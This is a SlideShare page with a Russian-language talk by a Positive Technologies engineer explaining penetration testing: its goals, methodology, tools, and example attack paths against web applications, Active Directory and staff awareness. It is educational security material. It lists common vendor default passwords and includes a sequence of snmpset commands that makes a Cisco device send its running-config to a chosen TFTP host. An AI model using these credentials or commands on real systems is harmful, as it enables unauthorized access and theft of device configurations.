SlideShare a Scribd company logo
Тестирование на проникновение Что такое ? Дмитрий Евтеев ( Positive  Technologies)
Penetration testing internals Тестирование на проникновение != моделирование действий (не)реального  злоумышленника Тестирование на проникновение != инструментальное сканирование с ручной верификацией уязвимостей Тестирование на проникновение – это комплекс мероприятий, направленных на оценку текущего состояния процессов обеспечения ИБ тестирование на преодоление защиты это один из методов проведения аудита ИБ
Методика С одной стороны это Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … С другой стороны это Center of Internet Security (CIS) guides Стандарты серии  ISO 2700x …
Возможности Механизм  N … X Управление инцидентами Некоторые действия атакующей стороны были выявлены, но не были идентифицированы как атака. 2 Механизм  N … X
Цели Высокоуровневые Внутренняя политика (пентест, как инструмент воздействия) Оценка текущего состояния процессов обеспечения ИБ Так надо ( compliance ) Технологические Осуществить НСД во внутреннюю сеть со стороны сети Интернет Получить максимальные привилегии в основных инфраструктурных системах ( Active Directory,  сетевое оборудование, СУБД,  ERP  и пр.) Получить доступ к определенным информационным ресурсам Получить доступ к определенным данным (информации)
Подходы Периметровый пентест (с последующим развитием атаки во внутренней сети) С уведомлением и без уведомления администраторов Анализ защищенности беспроводных сетей Внутренний пентест С рабочего места среднестатистического пользователя сети Из выбранного сегмента сети Тестирование отдельного компонента информационной системы (анализ защищенности) Черный-, серый- белый-ящик Оценка осведомленности сотрудников компании в вопросах информационной безопасности
Реальная атака  VS  тестирование на проникновение Для непосредственного исполнителя пентест – это ВЗЛОМ! Ограничения Соблюдение законов РФ Ограниченное время Минимизация воздействия Отсутствие услуги тестирования типа  DDoS Неудобства Согласование действий (порой это доходит до абсурда!) Ответственность / Аккуратность Преимущества Не нужно скрывать свою активность Упрощение процесса по идентификации периметра сети Возможность перехода к серому- и белому-ящику
Используемые инструменты Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Браузер, блокнот…
Проблема защиты  Web -приложений Наиболее часто встречающиеся уязвимости веб-приложений при проведении анализа методом «черного ящика» (данные за 2009 год,  http://ptsecurity.ru/analytics.asp )
Примеры пентестов : Web- приложения Что такое пентест веб-приложения методикой черного-ящика ? Web- сервер Рабочее место аудитора Проверка 1 Проверка  N Найдена уязвимость Уязвимость 1: подбор пароля Impact: доступ к приложению (с ограниченными привилегиями) Уязвимость 2: внедрение операторов SQL Impact: только чтение файлов (включена опция magic quotes) Уязвимость 3: выход за каталог Impact: только чтение файлов (потенциально LFI) Уязвимость 4: предсказуемое значение идентификатора загружаемого файла Уязвимость 3 + Уязвимость 4 = Impact: выполнение команд на сервере Следующий шаг - РАЗВИТИЕ АТАКИ
Проблема слабых паролей Используется рекомендованная политика по заданию паролей Пароль администратора такого домена ? ( совпадает с логином )
Примеры пентестов :  Подбор паролей (дефолты) Общепринятые admin:123456 Administrator:P@ssw0rd … SAP (DIAG)  SAP*: 06071992, PASS манданты:   000, 001, 066, все новые (RFC)  SAPCPIC: ADMIN манданты:000, 001, 066, все новые … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
Примеры пентестов :  Привет Павлик  :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
Проблема разграничения доступа Сетевой доступ Архитектура сети (ДМЗ, технологическая сеть, пользовательский сегмент, тестовая среда) Удаленный доступ к сети Доступ к данным Общие ресурсы (пароли в открытом виде, резервные копии данных, различная чувствительная информация) Web- приложения, СУБД,  ERP
Проблема управления доступом Разделение полномочий между администраторами Пользователи с повышенными привилегиями Сервисы (!) с не требуемым уровнем доступа Общая проблема управления идентификаторами
Примеры пентестов :  Использование уязвимостей CANVAS && Metasploit
Примеры пентестов :  Расширение привилегий в  Active Directory Вариант 1 :  Подбор пароля Вариант 2 :  Использование уязвимостей в сервисах на контроллерах домена Вариант 3 :  Проведение атаки  Pass-the-hash Вариант  4:  Создание нового пользователя с доменного компьютера, который посещает администратор домена Вариант 5 :  Проведение атаки типа «Отравление  ARP  кэша» (например, перехват сессии  RDP,  понижение уровня проверки подлинности до  LM ) Вариант  6:  Проведение атаки  NTLM Relay Вариант  7:  Нахождение   и восстановление  system state  домена (например, после успешной атаки на сервер резервного копирования) Вариант 8 :  Получение расширенных привилегий за счет других систем (пример, контроль над записями в корневых  DNS  компании) Вариант 9 :  Получение расширенных привилегий за счет уязвимостей других систем (хранение паролей с использованием обратимого шифрования, использование небезопасных протоколов и т.д.) Вариант  N …
Примеры пентестов :  Анализ защищенности Сканирование сети Успешно подобран пароль! Эксплуатация  SQL Injection Выполнение команд на сервере Повышение привилегий Атака на внутренние ресурсы Внутренний пентест Установка сканера  MaxPatrol Поиск уязвимостей Эксплуатация уязвимостей Перемещение в ИС ЦО Проведение атаки на ресурсы ЦО Получение максимальных привилегий во всей сети!
Примеры пентестов :  Анализ защищенности
Примеры пентестов :  Беспроводные сети
Примеры пентестов :  Оценка эффективности программы повышения осведомленности Рассылка провоцирующих сообщений по электронной почте Рассылка провоцирующих сообщений с помощью системы ICQ (и других IM) Распространение носителей информации, содержащих провоцирующие данные Проведение опроса среди сотрудников Живой разговор (по телефону,  skype )
Примеры пентестов :  Пример набора проверок Описание сообщения Реализуемая атака Контролируемые события Сообщение от авторитетного лица, содержащее приложенный исполняемый файл. Распространение сетевых червей. Целевое заражение системы троянской программой. Открытие почтового сообщения. Запуск приложенного файла. Сообщение от внутреннего лица, содержащее ссылку на Web-сайт. Ссылка указывает на исполняемый файл.  Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Загрузка файла с Web-сервера. Запуск файла. Сообщение от авторитетного лица, содержащее ссылку на Web-сайт. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Переход по предложенной ссылке.
Примеры пентестов :  Оценка эффективности программы повышения осведомленности
Резюме Тестирование на проникновение  –  это комплекс мероприятий, позволяющий провести эффективную оценку текущего состояния процессов обеспечения информационной безопасности Тестирование на проникновение  –  это поиск и использование недостатков в процессах обеспечения информационной безопасности управление уязвимостями управление конфигурациями управление инцидентами управление безопасностью веб-приложений, СУБД,  ERP,  проводными и беспроводными сетями и пр. etc
Спасибо за внимание! [email_address] http://devteev.blogspot.com/

More Related Content

PPTX
Тестирование на проникновение
PPTX
этичный хакинг и тестирование на проникновение (Publ)
PPTX
Этичный хакинг или пентестинг в действии
DOC
Pentest Report Sample
PDF
Кто такой специалист по иб
PDF
тест на проникновение
DOC
PT Penetration Testing Report (sample)
PPT
Penetration testing (AS IS)
Тестирование на проникновение
этичный хакинг и тестирование на проникновение (Publ)
Этичный хакинг или пентестинг в действии
Pentest Report Sample
Кто такой специалист по иб
тест на проникновение
PT Penetration Testing Report (sample)
Penetration testing (AS IS)

What's hot (20)

PDF
Практика обнаружения атак, использующих легальные инструменты
PPTX
Penetration testing
PDF
Охота на угрозы на BIS summit 2016
PPTX
Что общего у CTF и тестов на проникновение?
PDF
Check Point. Сергей Чекрыгин. "На один шаг впереди"
PPTX
Безопаность SAP-систем
PDF
Трудовые будни охотника на угрозы
PDF
Check Point. Сергей Чекрыгин. "На один шаг впереди"
PDF
CheckPoint. Сергей Чекрыгин. "Check Pont. На шаг впереди"
PDF
Check Point. Сергей Чекрыгин. "На шаг впереди"
PPTX
PT ESC - кто полечит доктора?
PPTX
Audit intro
PPTX
Cis critical security controls. контроль 3 безопасная конфигурация устройств
PPTX
Статистика по результатам тестирований на проникновение и анализа защищенност...
PPTX
Алгоритмы пентестов. BaltCTF 2012
PPTX
SIEM для ИТ
PPT
Ломаем (и строим) вместе
PPTX
Решения и сервисы для обеспечения ИБ (ИБ Банков 2016)
PPTX
RuSIEM (15.11.2015)
PPT
Реальные опасности виртуального мира.
Практика обнаружения атак, использующих легальные инструменты
Penetration testing
Охота на угрозы на BIS summit 2016
Что общего у CTF и тестов на проникновение?
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Безопаность SAP-систем
Трудовые будни охотника на угрозы
Check Point. Сергей Чекрыгин. "На один шаг впереди"
CheckPoint. Сергей Чекрыгин. "Check Pont. На шаг впереди"
Check Point. Сергей Чекрыгин. "На шаг впереди"
PT ESC - кто полечит доктора?
Audit intro
Cis critical security controls. контроль 3 безопасная конфигурация устройств
Статистика по результатам тестирований на проникновение и анализа защищенност...
Алгоритмы пентестов. BaltCTF 2012
SIEM для ИТ
Ломаем (и строим) вместе
Решения и сервисы для обеспечения ИБ (ИБ Банков 2016)
RuSIEM (15.11.2015)
Реальные опасности виртуального мира.
Ad

Viewers also liked (20)

PDF
С чего начать свой путь этичного хакера?
PPTX
Доклад на v воронежском форуме ver. 0.3
PPTX
CodeFest 2012. Белов С. — Пентест на стероидах. Автоматизируем процесс
PDF
Mobile Device Security
PPT
Pentest requirements
PDF
Alexey Sintsov - Where do the money lie
PDF
Kaspersky SAS SCADA in the Cloud
PPTX
Avoid the Hack
PPT
Defcon Moscow #0x0A - Dmitry Evteev "Pentest vs. APT"
PPTX
Database honeypot by design
PPTX
Web security
PPTX
автоматизируем пентест Wifi сети
PDF
Wps pixie dust attack
PDF
#root это только начало
PDF
Сканирование уязвимостей со вкусом Яндекса. Тарас Иващенко, Яндекс
PPTX
Кое-что о Wi-Fi (Денис Жевнер)
PPTX
Wi Fi Security
PPTX
Опыт организации тестирования безопасности Web приложений в компании
PPTX
Угадываем пароль за минуту
PPTX
Тестирование уязвимостей веб приложений
С чего начать свой путь этичного хакера?
Доклад на v воронежском форуме ver. 0.3
CodeFest 2012. Белов С. — Пентест на стероидах. Автоматизируем процесс
Mobile Device Security
Pentest requirements
Alexey Sintsov - Where do the money lie
Kaspersky SAS SCADA in the Cloud
Avoid the Hack
Defcon Moscow #0x0A - Dmitry Evteev "Pentest vs. APT"
Database honeypot by design
Web security
автоматизируем пентест Wifi сети
Wps pixie dust attack
#root это только начало
Сканирование уязвимостей со вкусом Яндекса. Тарас Иващенко, Яндекс
Кое-что о Wi-Fi (Денис Жевнер)
Wi Fi Security
Опыт организации тестирования безопасности Web приложений в компании
Угадываем пароль за минуту
Тестирование уязвимостей веб приложений
Ad

Similar to Что такое пентест (20)

PPT
Развитие систем анализа защищенности. Взгляд в будущее!
PPTX
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
PPT
IBM Proventia IPS
PPT
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
PPTX
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
PDF
Check Point. Сергей Чекрыгин. "Check Pont. На шаг впереди"
PDF
Визуализация взломов в собственной сети PAN
PPT
Занятие № 10. Учетные записи пользователей. Обслуживание дисков. Настройка па...
PDF
Check Point. Сергей Чекрыгин. "На один шаг впереди"
PDF
17 способов проникновения во внутреннюю сеть компании
PDF
Безмалый Владимир Федорович - Сервисы репутации в информационной безопасности
PPTX
RuSIEM 2016
PPTX
Check Point. Сергей Чекрыгин. "На один шаг впереди"
PDF
FireEye - система защиты от целенаправленных атак
PDF
Найти и обезвредить
PDF
Архитектура защищенного периметра
PDF
Использование передовых возможностей кибербезопасности.pdf
PDF
Борьба с вредоносным кодом: от базовых мер к целостной стратегии
PPTX
Анализ ИБ и расследование инцидентов ИБ (учебный семинар)
PDF
CyberArk 21.10.2014
Развитие систем анализа защищенности. Взгляд в будущее!
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
IBM Proventia IPS
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Check Point. Сергей Чекрыгин. "Check Pont. На шаг впереди"
Визуализация взломов в собственной сети PAN
Занятие № 10. Учетные записи пользователей. Обслуживание дисков. Настройка па...
Check Point. Сергей Чекрыгин. "На один шаг впереди"
17 способов проникновения во внутреннюю сеть компании
Безмалый Владимир Федорович - Сервисы репутации в информационной безопасности
RuSIEM 2016
Check Point. Сергей Чекрыгин. "На один шаг впереди"
FireEye - система защиты от целенаправленных атак
Найти и обезвредить
Архитектура защищенного периметра
Использование передовых возможностей кибербезопасности.pdf
Борьба с вредоносным кодом: от базовых мер к целостной стратегии
Анализ ИБ и расследование инцидентов ИБ (учебный семинар)
CyberArk 21.10.2014

More from Dmitry Evteev (20)

PPTX
Противодействие хищению персональных данных и платежной информации в сети Инт...
PPTX
penetest VS. APT
PPTX
Уязвимости систем ДБО в 2011-2012 гг.
PPTX
Истории из жизни. Как взламывают сети крупных организаций.
PPTX
Демонстрация атаки на ДБО
PPTX
Типовые проблемы безопасности банковских систем
PPTX
Услуги PT для банков
PPTX
PHDays 2012: Future Now
PPTX
Такой (не)безопасный веб
PPTX
Собираем команду хакеров
PPTX
Тестирование на проникновение в сетях Microsoft (v.2)
PPTX
Тестирование на проникновение в сетях Microsoft
PPT
PHDays CTF 2011 Quals/Afterparty: как это было
PPTX
Как взламывают сети государственных учреждений
PPT
Введение в тему безопасности веб-приложений
PPT
Практика проведения DDoS-тестирований
PPT
Мобильный офис глазами пентестера
PPT
Безопасность веб-приложений сегодня
PPT
CC HackQuest 2010 Full Disclosure (мастер-класс)
DOC
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Противодействие хищению персональных данных и платежной информации в сети Инт...
penetest VS. APT
Уязвимости систем ДБО в 2011-2012 гг.
Истории из жизни. Как взламывают сети крупных организаций.
Демонстрация атаки на ДБО
Типовые проблемы безопасности банковских систем
Услуги PT для банков
PHDays 2012: Future Now
Такой (не)безопасный веб
Собираем команду хакеров
Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft
PHDays CTF 2011 Quals/Afterparty: как это было
Как взламывают сети государственных учреждений
Введение в тему безопасности веб-приложений
Практика проведения DDoS-тестирований
Мобильный офис глазами пентестера
Безопасность веб-приложений сегодня
CC HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)

Что такое пентест

  • 1. Тестирование на проникновение Что такое ? Дмитрий Евтеев ( Positive Technologies)
  • 2. Penetration testing internals Тестирование на проникновение != моделирование действий (не)реального злоумышленника Тестирование на проникновение != инструментальное сканирование с ручной верификацией уязвимостей Тестирование на проникновение – это комплекс мероприятий, направленных на оценку текущего состояния процессов обеспечения ИБ тестирование на преодоление защиты это один из методов проведения аудита ИБ
  • 3. Методика С одной стороны это Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … С другой стороны это Center of Internet Security (CIS) guides Стандарты серии ISO 2700x …
  • 4. Возможности Механизм N … X Управление инцидентами Некоторые действия атакующей стороны были выявлены, но не были идентифицированы как атака. 2 Механизм N … X
  • 5. Цели Высокоуровневые Внутренняя политика (пентест, как инструмент воздействия) Оценка текущего состояния процессов обеспечения ИБ Так надо ( compliance ) Технологические Осуществить НСД во внутреннюю сеть со стороны сети Интернет Получить максимальные привилегии в основных инфраструктурных системах ( Active Directory, сетевое оборудование, СУБД, ERP и пр.) Получить доступ к определенным информационным ресурсам Получить доступ к определенным данным (информации)
  • 6. Подходы Периметровый пентест (с последующим развитием атаки во внутренней сети) С уведомлением и без уведомления администраторов Анализ защищенности беспроводных сетей Внутренний пентест С рабочего места среднестатистического пользователя сети Из выбранного сегмента сети Тестирование отдельного компонента информационной системы (анализ защищенности) Черный-, серый- белый-ящик Оценка осведомленности сотрудников компании в вопросах информационной безопасности
  • 7. Реальная атака VS тестирование на проникновение Для непосредственного исполнителя пентест – это ВЗЛОМ! Ограничения Соблюдение законов РФ Ограниченное время Минимизация воздействия Отсутствие услуги тестирования типа DDoS Неудобства Согласование действий (порой это доходит до абсурда!) Ответственность / Аккуратность Преимущества Не нужно скрывать свою активность Упрощение процесса по идентификации периметра сети Возможность перехода к серому- и белому-ящику
  • 8. Используемые инструменты Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Браузер, блокнот…
  • 9. Проблема защиты Web -приложений Наиболее часто встречающиеся уязвимости веб-приложений при проведении анализа методом «черного ящика» (данные за 2009 год, http://ptsecurity.ru/analytics.asp )
  • 10. Примеры пентестов : Web- приложения Что такое пентест веб-приложения методикой черного-ящика ? Web- сервер Рабочее место аудитора Проверка 1 Проверка N Найдена уязвимость Уязвимость 1: подбор пароля Impact: доступ к приложению (с ограниченными привилегиями) Уязвимость 2: внедрение операторов SQL Impact: только чтение файлов (включена опция magic quotes) Уязвимость 3: выход за каталог Impact: только чтение файлов (потенциально LFI) Уязвимость 4: предсказуемое значение идентификатора загружаемого файла Уязвимость 3 + Уязвимость 4 = Impact: выполнение команд на сервере Следующий шаг - РАЗВИТИЕ АТАКИ
  • 11. Проблема слабых паролей Используется рекомендованная политика по заданию паролей Пароль администратора такого домена ? ( совпадает с логином )
  • 12. Примеры пентестов : Подбор паролей (дефолты) Общепринятые admin:123456 Administrator:P@ssw0rd … SAP (DIAG) SAP*: 06071992, PASS манданты: 000, 001, 066, все новые (RFC) SAPCPIC: ADMIN манданты:000, 001, 066, все новые … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
  • 13. Примеры пентестов : Привет Павлик :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
  • 14. Проблема разграничения доступа Сетевой доступ Архитектура сети (ДМЗ, технологическая сеть, пользовательский сегмент, тестовая среда) Удаленный доступ к сети Доступ к данным Общие ресурсы (пароли в открытом виде, резервные копии данных, различная чувствительная информация) Web- приложения, СУБД, ERP
  • 15. Проблема управления доступом Разделение полномочий между администраторами Пользователи с повышенными привилегиями Сервисы (!) с не требуемым уровнем доступа Общая проблема управления идентификаторами
  • 16. Примеры пентестов : Использование уязвимостей CANVAS && Metasploit
  • 17. Примеры пентестов : Расширение привилегий в Active Directory Вариант 1 : Подбор пароля Вариант 2 : Использование уязвимостей в сервисах на контроллерах домена Вариант 3 : Проведение атаки Pass-the-hash Вариант 4: Создание нового пользователя с доменного компьютера, который посещает администратор домена Вариант 5 : Проведение атаки типа «Отравление ARP кэша» (например, перехват сессии RDP, понижение уровня проверки подлинности до LM ) Вариант 6: Проведение атаки NTLM Relay Вариант 7: Нахождение и восстановление system state домена (например, после успешной атаки на сервер резервного копирования) Вариант 8 : Получение расширенных привилегий за счет других систем (пример, контроль над записями в корневых DNS компании) Вариант 9 : Получение расширенных привилегий за счет уязвимостей других систем (хранение паролей с использованием обратимого шифрования, использование небезопасных протоколов и т.д.) Вариант N …
  • 18. Примеры пентестов : Анализ защищенности Сканирование сети Успешно подобран пароль! Эксплуатация SQL Injection Выполнение команд на сервере Повышение привилегий Атака на внутренние ресурсы Внутренний пентест Установка сканера MaxPatrol Поиск уязвимостей Эксплуатация уязвимостей Перемещение в ИС ЦО Проведение атаки на ресурсы ЦО Получение максимальных привилегий во всей сети!
  • 19. Примеры пентестов : Анализ защищенности
  • 20. Примеры пентестов : Беспроводные сети
  • 21. Примеры пентестов : Оценка эффективности программы повышения осведомленности Рассылка провоцирующих сообщений по электронной почте Рассылка провоцирующих сообщений с помощью системы ICQ (и других IM) Распространение носителей информации, содержащих провоцирующие данные Проведение опроса среди сотрудников Живой разговор (по телефону, skype )
  • 22. Примеры пентестов : Пример набора проверок Описание сообщения Реализуемая атака Контролируемые события Сообщение от авторитетного лица, содержащее приложенный исполняемый файл. Распространение сетевых червей. Целевое заражение системы троянской программой. Открытие почтового сообщения. Запуск приложенного файла. Сообщение от внутреннего лица, содержащее ссылку на Web-сайт. Ссылка указывает на исполняемый файл. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Загрузка файла с Web-сервера. Запуск файла. Сообщение от авторитетного лица, содержащее ссылку на Web-сайт. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Переход по предложенной ссылке.
  • 23. Примеры пентестов : Оценка эффективности программы повышения осведомленности
  • 24. Резюме Тестирование на проникновение – это комплекс мероприятий, позволяющий провести эффективную оценку текущего состояния процессов обеспечения информационной безопасности Тестирование на проникновение – это поиск и использование недостатков в процессах обеспечения информационной безопасности управление уязвимостями управление конфигурациями управление инцидентами управление безопасностью веб-приложений, СУБД, ERP, проводными и беспроводными сетями и пр. etc
  • 25. Спасибо за внимание! [email_address] http://devteev.blogspot.com/